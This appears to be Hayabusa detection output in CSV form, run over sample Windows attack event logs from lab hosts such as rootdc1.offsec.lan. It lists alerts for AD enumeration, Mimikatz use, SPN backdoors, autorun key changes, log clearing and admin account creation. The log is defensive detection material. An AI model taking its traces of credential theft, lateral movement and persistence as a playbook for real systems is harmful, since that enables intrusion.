2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59919  :  LogonID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59920  :  LogonID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59921  :  LogonID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59993  :  LogonID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 60017  :  LogonID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 60018  :  LogonID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 60019  :  LogonID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ATACORE01$  :  Workstation: -  :  IP Address: 10.23.42.30  :  Port: 62476  :  LogonID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59641  :  LogonID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$  :  Workstation: -  :  IP Address: fe80::1cae:5aa4:9d8d:106a  :  Port: 51370  :  LogonID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59643  :  LogonID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59644  :  LogonID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59645  :  LogonID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe""   :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe""   :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\windows\system32\notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe""   :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe""  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: rdpclip  :  Path: C:\Windows\System32\rdpclip.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""\\tsclient\c\temp\stack\a.exe""   :  Path: \\tsclient\c\temp\stack\a.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-11 22:21:11.693 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:11.693 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:17.514 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:17.514 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:18.640 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:18.640 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx
2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx
2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss  :  SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx
2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss  :  SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx
2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,medium,Local user account created,User: hacking-local-acct  :  SID:S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx
2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-1470532092-3758209836-3742276719-1001  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx
2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-1470532092-3758209836-3742276719-1001  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx
